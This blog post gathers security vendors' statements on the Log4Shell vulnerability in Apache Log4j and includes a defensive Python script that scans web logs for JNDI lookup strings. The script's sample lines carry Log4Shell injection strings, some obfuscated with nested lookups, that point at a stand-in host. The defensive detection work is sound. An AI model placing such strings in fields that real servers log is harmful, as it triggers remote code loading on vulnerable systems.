One of the harder parts of what I do is filtering press releases to figure out which are hype and which have some enduring relevance. The first one I received about the Log4j exploit seemed over the top. This one, however, appears to have legs. Best practice tells us to take action and be concerned. Following are a number of statements from security leaders; take note of these.
This from my host platform, Cloudflare, “Last Friday we sent you an email about a zero-day exploit affecting the popular Apache Log4j utility (CVE-2021-44228). We advised you that Cloudflare had immediately updated our WAF to help protect you against this vulnerability. We also recommended that all organizations that use Log4j immediately update to the newest version to mitigate exploit attacks. The latest version can be found at the Log4j download page.”
Glen Pendley, Deputy CTO at Tenable, “Log4Shell, a critical vulnerability in Apache Log4j, shines a bright light on the risky practice of relying on open-source code libraries to build enterprise-scale applications. Many organizations around the world rely on open-source libraries as a key element in their ability to bring applications to market quickly. Yet, these libraries often stop short of a security-first approach. This dependence on what is effectively a wild, wild west of code libraries will continue to leave organizations vulnerable until time and resources are invested to make them more secure.”
And from Paul Laudanski, Head of Threat Intelligence at Tessian, “The log4j vulnerability has created endless golden opportunities for bad actors – and they know it and are getting creative. What they’re trying to do now is build an arsenal of tools that they can use across the globe for theft and service disruption, especially ahead of the holiday season. DDoS attacks in particular are a top concern, as exploitation could allow bad actors to download, install and then fully control an army of botnets. DDoS operators can then focus on attacks that bring down critical infrastructure – ranging from utilities to power grid – and especially retailers ahead of the holiday season, a time when people are notoriously distracted, tired and more prone to making security mistakes. Couple that with an increase in moratoriums, when no code is released into production, so emergency patches would require a break of that moratorium.
Meanwhile, there’s also the concern that the original CVE will end up generating subsequent CVEs, potentially exponentially multiplying its impact, similarly to the follow-on bugs we saw after SolarWinds. Luckily, log4j only has one in 2021 so far, but I wouldn’t be surprised if other related flaws are found soon. However, it’s worth noting one silver lining: white hats are working tirelessly to train folks on how to identify the vulnerability, so most teams will now be properly educated and informed on the growing threat.”
From the blog of Nozomi Networks, “At the end of last week (Friday, December 10), the cybersecurity world became aware of a new zero-day vulnerability in the Apache Log4j logging utility that has been allowing easy-to-exploit remote code execution (RCE). Coupled with the popularity of this tool, multiple companies and commercial applications have become affected by it. It received the codename Log4Shell. In addition to promptly deploying several protection mechanisms for our customers, Nozomi Networks set up a honeypot to monitor the situation and became aware of all potential global scans and exploitation attempts.”
“Apache quickly categorized the vulnerability as critical due to the simplicity of the attack and the number of susceptible platforms and systems. All an attacker has to do is send a malicious string that would be logged by the server. Minecraft users were exploiting servers using the chat function, and Twitter users could trigger the exploit by changing their display names, as could iPhone users by changing their phone name. In this post, we provide some technical details related to how malware authors immediately started taking advantage of this vulnerability.”
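The Nozomi quote above describes the core of the problem: any attacker-controlled string that reaches a Log4j logger (a chat message, a display name, an HTTP header) can carry a lookup expression. The defensive counterpart is to hunt for that expression in the logs you already collect. The script below is an added example, not code from this post or from any vendor quoted here. It scans a handful of constructed web-server access lines (hostnames use the reserved `example.invalid` domain) for the `${jndi:` lookup prefix, first collapsing the nested `${lower:...}` / `${upper:...}` / `${...:-x}` lookup forms that Log4j itself would evaluate, so that a plain substring match is not fooled by them. Field names and sample values are the author's assumptions for illustration.

```python
import re
from typing import Dict, List

# Constructed sample access-log lines (not from the page). Lines 2, 4 and 5
# carry a Log4j lookup expression in a client-controlled field; line 3 mentions
# "jndi" in a URL path but has no ${...} lookup and must not be flagged.
SAMPLE_LOGS: List[str] = [
    '203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Dec/2021:14:02:15 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://example.invalid/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:20 +0000] "GET /docs/jndi-tutorial.html HTTP/1.1" 200 2048 "-" "curl/7.79"',
    '198.51.100.23 - - [10/Dec/2021:14:02:31 +0000] "GET /api HTTP/1.1" 200 64 "-" "${${lower:j}ndi:rmi://example.invalid/b}"',
    '192.0.2.44 - - [10/Dec/2021:14:03:02 +0000] "GET / HTTP/1.1" 200 512 "${JNDI:dns://example.invalid/c}" "Mozilla/5.0"',
]

# Innermost lookup forms Log4j would evaluate before the outer lookup runs:
#   ${lower:X} / ${upper:X}  -> X   (case handled by the final IGNORECASE match)
#   ${name:-X}               -> X   (default-value syntax, e.g. ${::-j})
# Only lookups with no further "${" inside are matched, so nesting resolves
# inside-out across repeated passes.
_INNER_LOOKUP = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}",
    re.IGNORECASE,
)

# The lookup prefix we actually care about, after normalisation.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Collapse nested lookups so the literal text they evaluate to is visible."""
    for _ in range(max_rounds):
        new = _INNER_LOOKUP.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text
        )
        if new == text:
            break
        text = new
    return text


def is_suspicious(line: str) -> bool:
    """True if the line contains a JNDI lookup, directly or via nested lookups."""
    return _JNDI.search(normalize_lookups(line)) is not None


def scan_logs(lines: List[str]) -> List[Dict[str, object]]:
    """Return one record per flagged line: 1-based line number, client address
    (first whitespace-separated token) and the normalised text for analysts."""
    hits: List[Dict[str, object]] = []
    for idx, line in enumerate(lines, start=1):
        if is_suspicious(line):
            hits.append({
                "line": idx,
                "client": line.split(" ", 1)[0],
                "normalized": normalize_lookups(line),
            })
    return hits


if __name__ == "__main__":
    for hit in scan_logs(SAMPLE_LOGS):
        print(f"line {hit['line']} from {hit['client']}: {hit['normalized']}")
```

Run it against real access, application or chat logs by replacing `SAMPLE_LOGS` with the lines you read from disk; the `client` field lets you group hits by source for blocking or further triage. The normalisation step is the part worth keeping even if you port this to a SIEM query: a rule that only matches the literal string `${jndi:` will miss the nested forms that Log4j resolves before the outer lookup fires.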
Further from Amit Yoran, Chairman and CEO, Tenable, “Just as we warned, Log4Shell is unleashing holy hell on businesses everywhere. And the worst is yet to come if organizations don’t take immediate action.
Researchers are already observing ransomware activities as cybercriminals begin utilizing Log4Shell in their playbooks. Let me be clear, these ransomware activities are not going to go away – they will only increase like wildfire thanks in part to this new, perfect payload in the form of Log4Shell. Organizations need to take swift and decisive action as Log4Shell can and will completely undermine your security program.
No vendor’s product is a silver bullet to solve this problem. Eliminating the threat posed by Log4Shell requires hard work and time to understand this vulnerability and how it will morph and evolve over time to bypass protective measures.”